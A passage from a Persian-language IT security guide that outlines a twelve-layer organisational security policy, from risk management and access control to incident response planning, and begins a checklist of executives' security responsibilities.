‫ﺳﺎﺯﻣﺎﻧﻲ ﺗﺄﻛﻴﺪ ﺷﺪ ﻛﻪ ﻳﻜﻨﻔﺮ ﺑﺎﻳﺪ ﻧﻘﺶ ﺭﻫﺒﺮ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺑﮕﻴﺮﺩ‬
‫ﻭﻟﻲ ﻓﺮﺽ ﺑﺮ ﺍﻳﻦ ﮔﺬﺍﺷﺘﻪ ﻧﺸﺪ ﻛﻪ ﺍﻳـﻦ ﻓـﺮﺩ ﺩﺭ ﻳـﻚ ﺟﺎﻳﮕـﺎﻩ‬
‫ﺍﻧﺤﺼﺎﺭﻱ ﺳﺎﺯﻣﺎﻥ ﻣﺜﻞ "ﻣﺪﻳﺮﻳﺖ ﺍﺭﺷﺪ ﺍﻣﻨﻴﺖ" ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‬
‫)ﺑﻪ ﺍﺳﺘﺜﻨﺎﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺰﺭﮒ(‪ .‬ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ ﻣﺘﻮﺳـﻂ‬
‫ﻻ ﺍﺯ ﻧﻈﺮ ﺑﻮﺩﺟﻪ ﻭ ﺗﻌﺪﺍﺩ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑـﺎ ﻣﺤـﺪﻭﺩﻳﺖ ﻣﻮﺍﺟـﻪ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﻫﺴﺘﻴﻢ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﻨﺪﺭﺕ ﺑﺘﻮﺍﻥ ﺍﺯ ﻳﻜﻨﻔﺮ ﺑﻌﻨـﻮﺍﻥ‬
‫ﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻣﻨﻴﺖ ﻳﺎ ﻛﺎﺭﺷﻨﺎﺱ ﺗﻤﺎﻡ ﻭﻗﺖ ﺍﻣﻨﻴﺘﻲ ﺑﻬﺮﻩ ﮔﺮﻓـﺖ‪.‬‬
‫ﺑﺎ ﺍﻳﻦ ﻫﻤﻪ‪ ،‬ﻫﺮ ﺷﺮﻛﺘﻲ ﻛﻪ ﺑﻪ ﻧﺤﻮﻱ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﻣـﺮﺗﺒﻂ ﺍﺳـﺖ‬
‫ﺑﺎﻳﺪ ﻳﻚ ﻓﺮﺩ ﻳﺎ ﺣـﺪﺍﻛﺜﺮ ﻳـﻚ ﮔـﺮﻭﻩ ﻛﻮﭼـﻚ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ‬
‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﻬﺮﻩﮔﻴﺮﻱ ﺍﺯ ﺁﻳـﻴﻦﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﻳﻜﭙﺎﺭﭼﻪ‪ ،‬ﺭﻋﺎﻳـﺖ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻨﺎﺳـﺐ ﺩﺭ ﺗﻬﻴـﺔ ﮔﺰﺍﺭﺷـﻬﺎ‪،‬‬
‫ﺑﺮﻗﺮﺍﺭﻱ ﺭﻭﺍﺑﻂ ﻫﻮﺷﻴﺎﺭﺍﻧﻪ ﻭ ﺩﺭ ﻋـﻴﻦ ﺣـﺎﻝ ﺩﻭﺳـﺘﺎﻧﻪ ﺑـﺎ ﺳـﺎﻳﺮ‬
‫ﻛﺎﺭﻣﻨﺪﺍﻥ‪ ،‬ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ ﺧﺎﺭﺟﻲ‪ ،‬ﻓﺮﻭﺷﻨﺪﮔﺎﻥ‪ ،‬ﻭ ﻣﺸﺘﺮﻳﺎﻥ‪ ،‬ﻫﻤﻪ ﻭ‬
‫ﻫﻤﻪ ﻋﻮﺍﻣﻠﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻦ ﮔـﺮﻭﻩ ﻭ ﻳـﺎ ﺷـﺨﺺ‬
‫ﺧﺎﺹ ﺩﺭ ﺍﺟﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺳـﺎﺯﻣﺎﻥ ﻛﻤـﻚ ﻧﻤﺎﻳﻨـﺪ‪.‬‬
‫ﺍﻳــﻦ ﻓــﺼﻞ ﭘﻴــﺸﻨﻬﺎﺩﺍﺗﻲ ﻣــﺸﺮﻭﺡ ﺩﺭﺑــﺎﺭﺓ ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺍﻣﻨﻴــﺖ‬
‫ﭼﻨﺪﻻﻳﻪ ﻣﻄﺮﺡ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﻳﻚ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺩﻭﺍﺯﺩﻩ ﻻﻳـﻪﺍﻱ‬
‫ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ‪ .‬ﺑﺪﻧﺒﺎﻝ ﺁﻥ‪ ،‬ﻣﻨﺘﺨﺒـﻲ ﺍﺯ ﻓﻬﺮﺳـﺘﻬﺎﻱ ﻛﻨﺘـﺮﻝ‬
‫ﺍﻣﻨﻴﺘﻲ ﺁﻣﺪﻩ ﻛﻪ ﺑﺎ ﻳﺎﺩﺁﻭﺭﻱ ﻭﻇﺎﻳﻒ ﺭﻭﺯﺍﻧﺔ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﺍﻋـﻀﺎﻱ‬
‫ﺗﻴﻢ ﻣﺪﻳﺮﻳﺖ ﺩﺭ ﻗﺒﺎﻝ ﺍﻳﻤﻨﻲ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺧﺪﺷﻪﺩﺍﺭ‬
‫ﺷﺪﻥ ﺍﻣﻨﻴﺖ ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪١٨٢‬‬
‫‪١٩٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪.۲‬‬
‫ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ‪ -‬ﻳﻚ ﻣﻔﻬﻮﻡ ﻭﺳﻴﻊ ﺑﺮ ﻣﺒﻨـﺎﻱ‬
‫ﺍﻟﮕــﻮﻱ ‪ - OCTAVE‬ﻣﺘﻌﻠــﻖ ﺑــﻪ ‪ - CERT‬ﺑــﺮﺍﻱ‬
‫ﻣﺪﻳﺮﻳﺖ ﺩﺍﺭﺍﺋﻴﻬﺎ ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﻬﺎ‪.‬‬
‫‪.۳‬‬
‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ -‬ﺑﺮﺭﺳﻲ‬
‫ﻣﺠﺎﺯ ﺑﻮﺩﻥ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﻛﺎﺭﺑﺮ ﭘﻴﺶ ﺍﺯ ﺍﻋﻄﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﺭﺧﻮﺍﺳﺘﻲ‪ .‬ﺩﺭ ﻃﻮﻝ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ‪ ،‬ﻛـﺎﺭﺑﺮ ﻳـﻚ‬
‫ﻧﺎﻡ ﻳﺎ ﺷﻤﺎﺭﻩ ﺣﺴﺎﺏ )ﺩﺍﺩﺓ ﻣﻌﺮﻓﻲ( ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺭﻣﺰ ﻋﺒﻮﺭ‬
‫)ﺩﺍﺩﺓ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ( ﺭﺍ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻣـﻲﻛﻨـﺪ‪ .‬ﻛﻨﺘﺮﻟﻬـﺎﻱ‬
‫ﺩﺳﺘﺮﺳﻲ ﺍﻭﻟﻴﻦ ﺧـﻂ ﺗـﺪﺍﻓﻌﻲ ﺑـﻪ ﺣـﺴﺎﺏ ﻣـﻲ ﺁﻳﻨـﺪ ﻭ‬
‫ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺑــﺮ ﺍﺳــﺎﺱ ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ‪ ،‬ﻧــﺸﺎﻧﻬﺎ‪،‬‬
‫ﻣﺸﺨﺼﻪﻫﺎﻱ ﺯﻳﺴﺘﻲ‪ ،‬ﻭ ﻳـﺎ ﺯﻳﺮﺳـﺎﺧﺖ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ‬
‫ﺑﺎﺷﻨﺪ‪.‬‬
‫‪.۴‬‬
‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ‪ -‬ﺍﻳﺠﺎﺩ ﻳﻚ ﺳﻴﺴﺘﻢ ﻭ ﻳﺎ ﺗﺮﻛﻴﺒـﻲ‬
‫ﺍﺯ ﭼﻨﺪ ﺳﻴﺴﺘﻢ ﻛﻪ ﻣﻴﺎﻥ ﺩﻭ ﻳﺎ ﭼﻨﺪ ﺷﺒﻜﻪ‪ ،‬ﻣﺮﺯ ﻣﺸﺨﺺ‬
‫ﻛﻨﺪ‪.‬‬
‫‪.۵‬‬
‫ﻏﺮﺑﺎﻝ ﻛﺮﺩﻥ ﻣﺤﺘﻮﺍ ﺑﺼﻮﺭﺕ ﻓﻌـﺎﻝ ‪ -‬ﺩﺭ ﺳـﻄﺢ‬
‫ﻣﺮﻭﺭﮔﺮﻫـﺎﻱ ﻭﺏ‪ ،‬ﻻﺯﻡ ﺍﺳــﺖ ﻫـﺮ ﺁﻧﭽــﻪ ﻛـﻪ ﻣﻨﺎﺳــﺐ‬
‫ﻣﺤﻴﻂ ﻛﺎﺭ ﻧﻴﺴﺖ ﻳﺎ ﺑﺎ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﺼﻮﺏ ﻣﻐـﺎﻳﺮ ﺍﺳـﺖ‬
‫ﺗﺼﻔﻴﻪ ﺷﻮﺩ‪.‬‬
‫‪.۶‬‬
‫ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳـﺎﺏ )‪ - (IDS‬ﺍﻳـﻦ ﻳـﻚ ﺳﻴـﺴﺘﻢ‬
‫ﻣﺨﺘﺺ ﺷﻨﺎﺳـﺎﻳﻲ ﻧﻔﻮﺫﻫـﺎ ﻳـﺎ ﺗﻼﺷـﻬﺎﻱ ﻧﻔـﻮﺫ ﺍﺳـﺖ‪،‬‬
‫ﻧﻔﻮﺫﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﻭ ﻳﺎ ﺑﺎ ﻛﻤﻚ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﺒﺮﺓ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ‪ .‬ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ‬
‫ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ‪ ١٨٤‬ﻭ ﺳـﺎﻳﺮ ﺍﻃﻼﻋـﺎﺕ ﺷـﺒﻜﻪ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲ ﻛﻨﺪ‪ .‬ﺭﻭﺷﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺑﺴﺘﻪ ﺑﻪ ﻋﻮﺍﻣﻠﻲ ﭼـﻮﻥ ﺍﻧـﻮﺍﻉ‬
‫ﺣﻤﻼﺗﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﻧﻬﺎ ﺩﻓﺎﻉ ﻛﻨﺪ‪،‬‬
‫ﻣﺒﺎﺩﻱ ﻧﻔﻮﺫ‪ ،‬ﺍﻧﻮﺍﻉ ﺩﺍﺭﺍﺋﻴﻬﺎ‪ ،‬ﻭ ﻣﻴـﺰﺍﻥ ﻧﮕﺮﺍﻧـﻲ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﻫﺮﻳﻚ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎ‪ ،‬ﺑﺴﻴﺎﺭ ﻣﺘﻨﻮﻉ ﻫﺴﺘﻨﺪ‪.‬‬
‫‪.۷‬‬
‫ﻭﻳﺮﻭﺱﻳﺎﺑﻬـﺎ ‪ -‬ﻛﺮﻣﻬـﺎ‪ ،‬ﺗﺮﺍﻭﺍﻫـﺎ ﻭ ﻭﻳﺮﻭﺳـﻬﺎ ﻫﻤـﻪ‬
‫ﺍﺑﺰﺍﺭﻫــﺎﻳﻲ ﺑــﺮﺍﻱ ﺍﻧﺠــﺎﻡ ﺣﻤــﻼﺕ ﻫــﺴﺘﻨﺪ‪ .‬ﻭﻳــﺮﻭﺱ‬
‫ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺁﻟﻮﺩﻩ ﻛﺮﺩﻥ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﺳﻴﺴﺘﻢ‪ ،‬ﺧﻮﺩ ﺭﺍ ﺗﻮﺯﻳﻊ ﻛﻨﺪ‪ .‬ﺗﺮﺍﻭﺍﻫﺎ ﺧﻮﺩ ﺭﺍ ﺗﻮﺯﻳﻊ ﻳـﺎ ﺑـﻪ‬
‫ﺳﺎﻳﺮ ﻓﺎﻳﻠﻬﺎ ﻣﺘﺼﻞ ﻧﻤﻲﻛﻨﻨﺪ‪ .‬ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﻣﺨﺮﺏ ﻭ ﺁﺳﻴﺐﺭﺳﺎﻥ ﺭﺍ ﻣﻲﻳﺎﺑﻨﺪ ﻭ ﺍﺯ ﻛﺎﺭ ﻣﻲﺍﻧﺪﺍﺯﻧﺪ‪.‬‬
‫‪.۸‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ‪ -‬ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ‬
‫ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺩﺭﺣﺎﻝ ﺍﻧﺘﻘﺎﻝ ﻭ ﻳـﺎ ﺩﺭ ﻣﻌـﺮﺽ ﺳـﺮﻗﺖ )ﺍﺯ‬
‫ﺭﻭﻱ ﺭﺳﺎﻧﺔ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ؛ ﻣﺜ ﹰﻼ ﺭﺳﺎﻧﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻳﺎ ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺣﻤﻞ(‬
‫ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬
‫‪.۹‬‬
‫ﺁﺯﻣﻮﻥ ﺁﺳـﻴﺐ ﭘـﺬﻳﺮﻱ ‪ -‬ﻣﻨﻈـﻮﺭ ﺍﺯ ﺍﻳـﻦ ﺁﺯﻣـﻮﻥ‪،‬‬
‫ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑﺎﺭﺓ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﻮﺟـﻮﺩ‬
‫ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷﺒﻜﻪ ﻭ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ ﺟﻬـﺖ‬
‫ﻋﺒﻮﺭ ﺍﺯ ﻣﻮﺍﻧﻊ ﻣﻌﻤﻮﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺑﻪ ﻣﻨﺎﺑﻊ ﻣﺨﺘﻠﻒ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷﺒﻜﻪ ﺍﺳﺖ‪.‬‬
‫‪ .۱۰‬ﺭﺍﻫﺒﺮﻱ ﺻﺤﻴﺢ ﺳﻴﺴﺘﻤﻬﺎ ‪ -‬ﺍﻳـﻦ ﻣـﻮﺭﺩ ﺑﺎﻳـﺪ ﺑـﺎ‬
‫ﺗﻬﻴﺔ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺧﻄﺎﻫﺎﻱ ﺭﺍﻳﺞ ﺭﺍﻫﺒﺮﻱ ﻛـﻪ ﻋﻤﻮﻣـﹰﺎ ﺩﺭ‬
‫ﻣﺆﺳﺴﺎﺕ ﻳﺎ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺎﻟﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻭ ﻧﻴﺰ ﻓﻬﺮﺳﺘﻲ‬
‫ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺗﻜﻤﻴﻞ ﮔﺮﺩﺩ‪.‬‬
‫‪ .۱۱‬ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺪﻳﺮﻳﺖ ﺳﻴﺎﺳﺖ ‪ -‬ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻳـﻚ‬
‫ﻝ ﺍﺟﺮﺍﻱ ﺻـﺤﻴﺢ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ‬
‫ﺑﺮﻧﺎﻣﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺑﻪ ﻛﻨﺘﺮ ﹺ‬
‫ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺗـﺪﻭﻳﻦ‬
‫ﺷﺪﻩﺍﻧﺪ ﺑﭙﺮﺩﺍﺯﺩ‪.‬‬
‫‪ .۱۲‬ﻃﺮﺡ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩ )‪ ١٨٥(IRP‬ﻭ ﺗـﺪﺍﻭﻡ‬
‫ﮐﺴﺐ ﻭ ﮐﺎﺭ )‪ - ١٨٦(BCP‬ﺍﻳـﻦ ﺳـﻨﺪ ﺍﺻـﻠﻲﺗـﺮﻳﻦ‬
‫ﺳﻨﺪﻱ ﺍﺳﺖ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﺁﻥ ﻣﻲﮔﻮﻳـﺪ ﭼﮕﻮﻧـﻪ ﻳـﻚ‬
‫ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﻛﻨﺪ‪ ،‬ﺑﻪ ﺁﻥ ﻭﺍﻛﻨﺶ ﻧﺸﺎﻥ‬
‫ﻣﻲﺩﻫﺪ‪ ،‬ﻭ ﺁﺳﻴﺒﻬﺎﻱ ﺁﻧﺮﺍ ﺗﺮﻣﻴﻢ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺩﺍﺷـﺘﻦ ﻳـﻚ‬
‫‪ IRP‬ﻭ ﺁﺯﻣــﺎﻳﺶ ﺩﻭﺭﻩﺍﻱ ﺁﻥ ﻳﻜــﻲ ﺍﺯ ﺍﺻــﻠﻲﺗــﺮﻳﻦ‬
‫ﺣﺮﺑﻪﻫﺎﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺍﺳﺖ‪.‬‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺟﺮﺍﻳﻲ‬
‫‪١٨٧‬‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﻗﺒﻞ ﺩﻳﺪﻳﻢ ﺁﮔﺎﻫﻲ ﺍﺯ ﻧﻜـﺎﺕ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻣﺤﻴﻄﻲ ﻛﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺩﺭ ﺁﻥ ﺑﻪ ﻧﺤﻮ ﺍﺣﺴﻦ ﻗﺎﺩﺭ ﺑﻪ‬
‫ﻫﻤﻜﺎﺭﻱ ﺟﻬﺖ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺳـﺎﺯﻣﺎﻥ ﺧـﻮﺩ ﺑﺎﺷـﻨﺪ ﻳـﻚ ﻧﻜﺘـﺔ‬
‫ﻛﻠﻴﺪﻱ ﺍﺳﺖ‪ .‬ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺍﺯ ﻧﺤـﻮﺓ ﺑﺮﺧـﻮﺭﺩ ﻣـﺪﻳﺮﺍﻥ ﺑـﺎ ﻗﻮﺍﻋـﺪ‬
‫ﺍﻣﻨﻴﺘــﻲ ﻭ ﻣﻴــﺰﺍﻥ ﺳــﺮﻣﺎﻳﻪﮔــﺬﺍﺭﻱ ﺁﻧﻬــﺎ ﺩﺭ ﺣــﻮﺯﺓ ﺁﻣــﻮﺯﺵ ﻭ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻣﻨﻴﺖ ﻭ ﺳﺎﻳﺮ ﺯﻣﻴﻨﻪﻫﺎﻱ ﻣﺮﺑﻮﻃﻪ‪ ،‬ﺗﺄﺛﻴﺮ ﻣـﻲ ﭘﺬﻳﺮﻧـﺪ‪.‬‬
‫‪185 Incident Response Plan‬‬
‫‪186 Business Continuity Plan‬‬
‫‪184 Log Files‬‬
‫‪ ۱۸۷‬ﻣﻨﺒﻊ‪ ،ITS :‬ﻓﺼﻞ ﺳﻮﻡ‪ ،‬ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺟﺮﺍﻳﻲ‪ ،‬ﺹ ‪۵۰‬‬
‫‪١٩٩‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺑﺮﺍﻱ ﻣﺴﺌﻮﻟﻴﻦ ﺍﺟﺮﺍﻳﻲ ﺷﺮﻛﺖ ﻛﻪ ﺍﺟـﺮﺍﻱ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺭﻫﺒﺮﻱ ﻣﻲﻛﻨﻨﺪ ﺗﻨﻈﻴﻢ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ‬
‫ﺑﻤﻨﻈﻮﺭ ﺗﺮﻭﻳﺞ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﻣﺪﻳﺮﺍﻥ ﺑﺎﻳﺪ‪:‬‬
‫•‬
‫ﺁﻳﺎ ﺍﺯ ﺳﻄﻮﺡ ﺑﺎﻻﻱ ﻣﺪﻳﺮﻳﺖ ﺗﺎ ﻛﺎﺭﻛﻨﺎﻥ ﺧﻂ ﺗﻮﻟﻴﺪ ﻳـﻚ‬
‫ﻣﺴﻴﺮ ﺍﺭﺗﺒﺎﻃﻲ ﻣﺸﺨﺺ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫•‬
‫•‬
‫ﺗﺄﻛﻴﺪ ﻛﻨﻨﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺩﺭ ﺗﻤﺎﻡ ﺳـﻄﻮﺡ ﺳـﺎﺯﻣﺎﻥ ﺑـﺴﻴﺎﺭ‬
‫ﻣﻬﻢ ﺍﺳﺖ‪.‬‬
‫ﺁﻳﺎ ﻫﻤﻪ ﻣـﻲﺩﺍﻧﻨـﺪ ﻛـﻪ ﺁﻥ ﻣـﺴﻴﺮ ﺍﺭﺗﺒـﺎﻃﻲ ﭼﻴـﺴﺖ ﻭ‬
‫ﻛﺠﺎﺳﺖ؟‬
‫•‬
‫•‬
‫ﺍﻓﺮﺍﺩ ﺭﺍ ﻧﺴﺒﺖ ﺑﻪ ﭘﺮﺳﻴﺪﻥ ﺳـﺆﺍﻝ ﺩﺭ ﺯﻣﻴﻨـﺔ ﻓﻨﺎﻭﺭﻳﻬـﺎ ﻭ‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺗﺮﻏﻴﺐ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺁﻳﺎ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴﺖ ﺻﺮﺍﺣﺘﹰﺎ ﺑﺮ ﻋﻬﺪﺓ ﻳﻜـﻲ ﺍﺯ ﻣـﺪﻳﺮﺍﻥ‪،‬‬
‫ﻼ ﻗﺎﺋﻢ ﻣﻘﺎﻡ ﻣﺪﻳﺮ ﻋﺎﻣﻞ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﻳﺎ ﻣﺪﻳﺮ ﺍﻣﻨﻴـﺖ‪ ،‬ﻳـﺎ‬
‫ﻣﺜ ﹰ‬
‫ﻳﻜﻲ ﺩﻳﮕﺮ ﺍﺯ ﻣﺪﻳﺮﺍﻥ ﺳﺎﺯﻣﺎﻥ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؟‬
‫•‬
‫•‬
‫ﺍﺯ ﻛﻠﻴﺔ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺨﻮﺍﻫﻨﺪ ﺩﺭ ﺍﻳﻦ ﺭﺍﺑﻄﻪ ﺑـﺴﻴﺎﺭ ﻫﻮﺷـﻴﺎﺭ‬
‫ﺑﺎﺷﻨﺪ ﻭ ﻫﺮﮔﻮﻧﻪ ﻓﻌﺎﻟﻴﺖ ﻏﻴﺮﻣﻌﻤﻮﻝ )ﺩﺭ ﻣﺤـﻴﻂ ﺍﺩﺍﺭﻩ ﻳـﺎ ﺩﺭ‬
‫ﺳﻄﺢ ﺷﺒﻜﻪ( ﺭﺍ ﮔﺰﺍﺭﺵ ﺩﻫﻨﺪ‪.‬‬
‫ﺁﻳﺎ ﻣﺪﻳﺮﻳﺖ ﺑﺎ ﺍﺭﺍﺋﻪ ﻭ ﺍﻋﻤـﺎﻝ ﺑﺮﻧﺎﻣـﺔ ﺍﻣﻨﻴﺘـﻲ ﺳـﺎﺯﻣﺎﻥ‪،‬‬
‫ﺗﻌﻬﺪ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﻥ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺍﺳﺖ؟‬
‫•‬
‫•‬
‫ﺁﻳﺎ ﺭﻭﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻨﺎﺳﺐ ﺍﻧﺠﺎﻡ‬
‫ﺷﺪﻩ ﻭ ﺑﻮﺩﺟﺔ ﻣﺮﺑﻮﻃـﻪ ﻭﺍﻗﻌـﹰﺎ ﺑـﻪ ﺁﻥ ﺗﺨـﺼﻴﺺ ﻳﺎﻓﺘـﻪ‬
‫ﺍﺳﺖ؟‬
‫ﻣﺸﺨﺺ ﻛﻨﻨﺪ ﻛﻪ ﭼﻪ ﻛﺎﺭﻫﺎﻳﻲ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ‬
‫ﺧﺼﻮﺻﻲ ﻭ ﺍﻳﻤﻨﻲ ﻛﺎﺭﻛﻨﺎﻥ ﺻﻮﺭﺕ ﻣﻲ ﮔﻴـﺮﺩ‪ ،‬ﻭ ﺑـﺮﺍﻱ‬
‫ﻫﻤﻪ ﺭﻭﺷﻦ ﻧﻤﺎﻳﻨﺪ ﻛﻪ ﻭﻓـﺎﺩﺍﺭﻱ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﺩﺭ ﺩﺭﺟـﺔ‬
